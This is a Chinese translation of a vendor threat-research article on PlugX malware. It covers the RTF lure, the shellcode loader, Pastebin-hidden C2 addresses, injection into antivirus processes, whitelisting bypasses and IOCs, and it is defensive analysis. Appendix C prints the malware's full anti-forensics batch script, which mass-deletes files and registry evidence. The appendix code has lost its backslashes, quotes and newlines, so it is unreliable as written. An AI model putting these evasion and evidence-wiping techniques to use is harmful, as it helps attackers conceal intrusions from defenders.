屢禁不止：一個敢於將自己注入到殺毒軟體中的鬥士

01-29

PlugX惡意軟體可以算是攻擊界的老前輩了，自2012年被曝光以來，它就以各種形式被黑客利用，截至目前它還一直活躍在攻擊的最前沿。關於其長盛不衰的攻擊功能，已經有很多個機構對其進行了研究，比如：

1.由Circl機構發布的「TR-12-用於針對性攻擊的PlugX惡意軟體變體的分析」。

2.由JPCert機構發布的「分析最近的PlugX變體- P2P PlugX」。

3.由Airbus機構發布的「PlugX一些未覆蓋點」。

4.由Sophos機構發布的「下一代的PlugX」。

鑒於對其的大量研究，PlugX已經被各個安全廠商重點關注，還為此進行了專門的檢測。儘管如此，它仍然是今天許多攻擊者的首選工具，這意味著如果攻擊者要成功使用PlugX，就要對它進行不斷地升級和創新，才能成功感染目標。

我們在本文中選取了一組被一個攻擊者使用的PlugX樣本，以及他們為避免安全機制而採取的措施。這些攻擊的目標主要是視頻遊戲行業的公司。

在分析中，我們發現了該樣本使用了許多有趣的技術，比如：

1.解決初始C2地址

2.將PlugX與開源工具結合起來才能開始載入惡意軟體

3.避免在磁碟上檢測

為了保護用戶免受本文所述的這個樣本的攻擊，Palo Alto Networks公司採取了以下的方式：

1.Wildfire將本文中提到的所有文件標識為惡意。

2. Traps 4.0可以位本文所介紹的這些濫用的進程載入惡意代碼進行保護。

Palo Alto Networks的AutoFocus客戶可以通過標籤跟蹤本文所介紹的相關示例：ParanoidPlugX

相關IOC會在本文的附錄A中進行詳細介紹。

由RTF文件引發的攻擊過程

我們的介紹會從一個名為「新工資結構2017.doc」的RTF文件開始，它利用了CVE-2017-0199漏洞。攻擊者可能利用此漏洞通過誘使用戶打開處理特殊構造的Office文件在用戶系統上執行任意命令，從而控制用戶系統。RTF文件可以從以下URL下載其初始有效載荷：

hxxp://172.104.65[.]97/Office.rtf

這是一個下載腳本，嘗試下載並執行兩個有效載荷，代碼如下所示：

第一個有效載荷是Windows Installer（MSI）文件，我們對該文件進行了動態分析。我們可以從其操作中看到惡意軟體是PlugX，但是C2地址是一個http://pastebin.com的URL。利用Pastebin，我們識別了其中的一段代碼，並將其解碼為C2地址，但是查看返回的內容，我們卻無法立即識別C2。

譯者註：astebin是一個很方便的便簽網站，你可以很方便的複製粘貼你的文本內容然後做成便簽分享，很多黑客團隊喜歡把自己的攻擊成果（比如資料庫、代碼）貼在網站上來炫耀。

第二個文件是一個PowerShell腳本，它似乎基於一個載入任意shellcode的Rapid7 Ruby開發腳本。在這種情況下，shellcode是PlugX的副本，與MSI文件中包含的shellcode相同，我們將在下面進行剖析。

.NET包裝器

主要有效載荷是在之前提到的MSI文件中的Microsoft .NET Framework文件中提供的。執行後，.NET Framework包裝器將首先檢查VMware工具是否在後台運行，這一步會通過簡單的搜索任何名為「vmtoolsd」的操作來完成檢查。如果沒有匹配的進程正在運行，則惡意軟體繼續執行，在HKCU Software Microsoft Windows CurrentVersion RunOnce中創建名為「MSASCuiLTasks」的註冊表項以進行持久性注入。此註冊表項會導致惡意軟體在系統重新啟動時再次運行。接下來，它將複製內存中的第一階段shellcode並創建一個運行在其中的shellcode的新線程，負責此執行的代碼如圖1所示。Shellcode雖然未被加密，但是被進行了模糊化處理。

.NET包裝器的主要代碼，Shellcode數組是在一個新線程中創建和執行的

第一個shellcode會負責解密另一個shellcode代碼塊，然後第二個shellcode塊會依次使用RtlDecompressBuffer解壓內存中的主PlugX DLL。像PlugX一樣，最終DLL頭文件會缺少DOS和NT映像頭，它們會被替換為XV而不是MZ和PE，如圖2所示。

解碼的DLL有效載荷的映像頭被替換為XV而不是MZ和PE

最後，第二個shellcode代碼塊將解析導入和重定位並跳轉到DLL的入口點。

shellcode中的加密配置

惡意軟體的配置信息（包括C2信息）在第一個shellcode blob中加密，並作為參數傳遞給主要的PlugX DLL的DllMain函數。此DLL本身還包含連接到埠12345上的本地主機的默認配置。這意味著如果您手動提取DLL並執行它，那麼它將連接到localhost：12345而不是作為初始參數傳遞的實際C2伺服器通過第一個shellcode到DLL。

解密配置

如前所述，實際的配置數據存儲在第一階段的shellcode中，但是它不是以明文方式存儲，而是經過加密和壓縮的。配置數據採用的是JPCert先前描述的相同演算法進行加密，但使用不同的XOR值。

JPCert文章中討論的版本使用的是20140918, 353 ，而我們檢查的版本使用的是20141118, 8389的XOR值。同樣的解密常式也用於此示例的PlugX所需的任何其他字元串混淆或文件加密。解密字元串後，必須使用LZNT1進一步解壓縮。為此，我們可以使用附錄B中所介紹的Python腳本。

解密和解壓縮字元串，然後，我們可以輕鬆識別PlugX配置的各個方面，例如，我們可以看到它被注入到以下這三個過程：

1.%ProgramFiles(x86)%SophosAutoUpdateALUpdate.exe

2.%ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exe

3.%ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exe

可以看到，PlugX將自己注入到屬於殺毒產品套件過程的嘗試是特別大膽的一個挑戰。

除此之外，PlugX還會查詢四個PasteBin鏈接以從這些鏈接中提取C2地址：

https://pastebin[.]com/eSsjmhBG

https://pastebin[.]com/PSxQd6qw

https://pastebin[.]com/CzjM9qwi

https://pastebin[.]com/xHDSxxMD

從配置中提取的字元串的完整列表會在附錄D詳細介紹。

提取C2

PlugX具有從給定的URL中提取加密的C2配置的功能，在這種情況下，攻擊者就會創造性地將字元串隱藏在看似合法的文本塊中，從Pastebin檢索的內容的一個例子如下：

---- BEGIN SSH2 PUBLIC KEY ----nComment: "rsa-key"nAAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSdn8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3n/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Psn8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJEn2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=n---- END SSH2 PUBLIC KEY ----n

乍看起來我們什麼也沒有發現，但是這個例子使用了與Airbus中討論的相同技術。它解析了RSA公鑰加密演算法，尋找魔法值（magic value）「DZKS」和「DZJS」。然後它讀取和解密這些值之間的內容以產生如下所示的IP地址：

解釋使用此技術加密的字元串的Python腳本在附錄B的Python腳本中給出。

下圖給出了該示例的整個執行流程：

總而言之，攻擊者將許多不同的代碼鏈接在自定義和開放源代碼中，這些都是為了載入PlugX。鑒於組件的數量，攻擊者只需花費一些時間就能繼續使用相同的惡意軟體致力於逃避檢測。

其他PlugX示例

根據上面的發現，我們還發現了其他有趣的PlugX示例。這些示例基於發送到目標組織的類似樣本，攻擊者使用的基礎設施以及樣本的獨特傳送機制來確定。

「偏執」型PlugX

通過對一系列相關的PlugX樣本進行分析，PlugX似乎特別「偏執」於磁碟上的檢測，因此我們採取了特定的反取證步驟來防止在磁碟上被檢測到，比如以下這個樣本：

SHA256：6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb

該文件是一個自解壓RAR，這是PlugX的常見傳送機制，特別是當最終的有效內容將被合法可執行文件載入時。以上的樣本也一樣的使用該方法，因為由載入DLL「BlackBox.dll」的合法簽名的Microsoft二進位執行的最終有效載荷。然而，為了啟動惡意軟體的執行，攻擊者使用執行惡意軟體的批處理腳本，但批處理腳本不僅僅是啟動惡意軟體的執行。運行惡意軟體後，批處理腳本會繼續清除系統上存在的所有跡象，其中包括：

1.刪除安裝期間創建的所有初始文件，以及開始執行期間磁碟上所需的所有相關文件。

2.刪除與提取SFX RAR相關聯的所有註冊表項

3.刪除用戶協助與最近執行的應用程序相關的密鑰條目

4.刪除與最近運行的服務相關的所有註冊表項

顯然，使用這個PlugX的攻擊者為了防止它在磁碟上被檢測到，對註冊表和文件系統中都進行了特別的處理。為此，大多數的腳本運行都會多次執行刪除命令。

這樣一來，檢測人員就很難找到PlugX在磁碟上執行過的證據了，更別說對它進行實時追蹤了，這就意味著必須基於內存或網路的檢測來識別入侵，批處理腳本的完整內容會在附錄C中詳細介紹。

PlugX的開源

在2017年上半年，我們看到攻擊者開始改進這種「Paranoid」版本的PlugX ，因為它在感染系統之後，會讓系統的內存驟然變小，所以攻擊者就想開發一種繞過應用程序白名單技術。為此，他們開始整合開放源代碼技術，特別是已經彙編GitHub中，由用戶SubTee創建技術。例如，以下示例使用msbuild.exe在.NET Framework項目中將惡意軟體載入為Shellcode，有效地繞過了應用程序白名單技術：

SHA256：822b313315138a69fc3e3f270f427c02c4215088c214dfaf8ecb460a5418c5f3

此示例大致遵循了GIST曾經發布的關於PlugX的攻擊技術，但是附加的代碼似乎是攻擊者的習慣，它充當了載入shellcode的輔助器。如我們上述列舉的第一個例子，shellcode是另一個PlugX的有效載荷。

在另一種情況下，攻擊者使用從SubTee GitHub項目借用的另一個代碼段，來填寫完全模板化的.NET應用程序白名單繞過文件：

SHA256：3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2：

這樣攻擊者就不必編寫任何自己的代碼，而是直接將其shellcode粘貼到模板中，以便將PlugX作為可信應用程序的子進程啟動。

預防措施

雖然PlugX多年來一直被安全商所關注，但它一直處於活躍的狀態，屢禁不止，為此，我們將其活躍的原因進行了如下總結：

1.PlugX的使用者對現有的PlugX惡意軟體已經使用的得心應手了，從而不願意放棄。

2.儘管PlugX的版本進行了多次變異，但攻擊者也很難編寫一個令他們完全滿意的版本，所以每次攻擊，我們都會發現它的功能有所變化。

3.重新開發一種與PlugX一樣複雜的惡意軟體需要付出極大的成本，而且還不一定能成功。

很可能，這三個因素是PlugX流行多年的原因。雖然有許多PlugX攻擊者繼續使用相對平庸的技術來載入惡意軟體，使防禦者能夠輕鬆識別和防止它的執行，但是還有更多的PlugX在使用許多有趣的技術來避免檢測。

特別是，攻擊者已經充分利用開源工具來對它進行升級和改造，並通過github來分享執行有效載荷的許多技巧，這樣的惡性循環，造成了PlugX處於不斷地變化中。不出意外地話，很快就會有許多殺毒產品會把應用程序白名單作為PlugX攻擊防護的重點之一，但可以肯定，很快就會有新的技術來繞過這些防護。

附錄A：相關的IoCs

直接相關：

45.248.84[.]7

172.104.65[.]97

https://pastebin[.]com/eSsjmhBG

https://pastebin[.]com/PSxQd6qw

https://pastebin[.]com/CzjM9qwi

https://pastebin[.]com/xHDSxxMD

間接相關：

域:

http://kbklxpb.imshop.in

http://serupdate.wicp.net

http://msfcnsoft.com

http://micros0ff.com

http://msfcnsoft.com

http://microsoff.net

http://msffncsi.com

http://A781195.gicp.net

http://upgradsource.com

http://B781195.vicp.net

http://kbklxp.eicp.net

附錄B：Python腳本

LZNT1解密腳本，只適用於Windows：

import ctypesnfrom ctypes import *nwith open(mysettings.bin,rb) as f:n buffer = f.read()n nuncompressed_size = len(buffer) * 16nuncompressed = create_string_buffer(uncompressed_size)nFinalUncompressedSize = c_ulong(0)nnt = windll.ntdlln# COMPRESSION_FORMAT_LZNT1 = 2nres = nt.RtlDecompressBuffer(2, uncompressed, uncompressed_size, buffer, len(buffer), byref(FinalUncompressedSize))nif (res == 0):n uncompressed = uncompressed[0:FinalUncompressedSize.value]n

解碼PlugX配置：

def plugx_decode(data):n decode_key = struct.unpack_from(&lt;I, data, 0)[0] n out = n # XOR Values might possibly be varied. n key1 = decode_key ^ 20141118 n key2 = decode_key ^ 8389 n for c in data[4:]: n # ADD/SUB Values might possibly be varied. n key1 += 3373 n key2 -= 39779 n dec = ord(c) ^ (((key2 &gt;&gt; 16) &amp; 0xff ^ ((key2 &amp; 0xff ^ (((key1 &gt;&gt; 16) &amp; 0xff ^ (key1 - (key1 &gt;&gt; 8) &amp; 0xff)) - (key1 &gt;&gt; 24) &amp; 0xff)) - (key2 &gt;&gt; 8) &amp; 0xff)) - (key2 &gt;&gt; 24) &amp; 0xff)n out = out + chr(dec)n n return outn

從Pastebin解碼C2地址：

import structndef decode(buf):n res = ""n for i in range(0, len(buf) -1, 2):n dl = ord(buf[i + 1])n dl = dl - 0x41n dl = dl * 0x10n dl = dl + ord(buf[i])n dl = dl - 0x41n res += chr(dl)n return resndef decode_plugx_pastebin(buf):n start = buf.find(DZKS)n if start == -1:n return Nonen end = buf.find(DZJS, start + 4)n if end == -1:n return Nonen start += 4n data = buf[start:end]n decoded = decode(data)n connection_type = struct.unpack_from(&lt;H, decoded, 0)[0]n port = struct.unpack_from(&lt;H, decoded, 2)[0]n ip = decoded[4:]n print "Decoded IP: {}:{}, type: {}".format(ip, port, connection_type)n return Truendecode_plugx_pastebin(AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSGAAALLBAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2q9n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3J=)ndecode_plugx_pastebin(AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSDAAAAFAAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsAHyLye8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6aBha3q9niJFu2=)ndecode_plugx_pastebin(AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSEAAABGHBEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2niJ8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9=)ndecode_plugx_pastebin(AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=)n

附錄C：a.bat

mscorsvw.exencscript del.vbsndel BlackBox.dllndel mscorsvw.exendel BlackBoxndel explorer.exencscript del.vbsndel %sfxcmd%ndel mscorsvw.exendel BlackBox.dllndel BlackBoxndel explorer.exendel del.vbsndel a.batndel %sfxcmd%ndel mscorsvw.exendel BlackBox.dllndel BlackBoxndel explorer.exendel del.vbsndel a.batnreg delete "HKLMSYSTEMControlSet001servicesemproxy" /fnreg delete "HKLMSYSTEMControlSet002servicesemproxy" /fnreg delete "HKLMSYSTEMCurrentControlSetservicesemproxy" /fnreg delete "HKLMSYSTEMControlSet001servicesEmpPrx" /fnreg delete "HKLMSYSTEMControlSet002servicesEmpPrx" /fnreg delete "HKLMSYSTEMCurrentControlSetservicesEmpPrx" /fnreg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASAPI32" /fnreg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASMANCS" /fnreg delete "HKU.DEFAULTSoftwareWinRAR SFX" /fn n nreg delete "HKUS-1-5-18SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script Host" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script HostSettings" /fnreg delete "HKUS-1-5-18SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /fnreg delete "HKUS-1-5-18SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /fnreg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fn nreg delete "HKUS-1-5-19SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script Host" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script HostSettings" /fnreg delete "HKUS-1-5-19SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /fnreg delete "HKUS-1-5-19SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /fnreg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fn nreg delete "HKUS-1-5-20SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script Host" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script HostSettings" /fnreg delete "HKUS-1-5-20SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /fnreg delete "HKUS-1-5-20SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /fnreg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fn nreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script Host" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script HostSettings" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fn nreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script Host" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script HostSettings" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /fnreg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fndel /s c:windowstemp*.batndel /s c:windowstemp*.datndel /s c:windowstemp*.dllndel /s c:windowstemp*.exendel /s c:windowstemp*.vbsndel %0n

附錄D：PlugX提取字元串

https//pastebin.com/eSsjmhBGnhttps://pastebin.com/PSxQd6qwnhttps://pastebin.com/CzjM9qwinhttps://pastebin.com/xHDSxxMDn%ProgramData%arm2sv1knDSSMnDSSMnMicrosoft Office Document Update UtilitynSoftwareMicrosoftWindowsCurrentVersionRunnJmLIn%ProgramFiles(x86)%SophosAutoUpdateALUpdate.exen%ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exen%ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exen%windir%system32FlashPlayerApp.exenslaxnpastebinnmahTszuBzqwUTcGtn%ProgramData%arm2sv1kAkgcln

本文翻譯自Paranoid PlugX - Palo Alto Networks Blog，如若轉載，請註明原文地址：屢禁不止：一個敢於將自己注入到殺毒軟體中的鬥士更多內容請關注「嘶吼專業版」——Pro4hou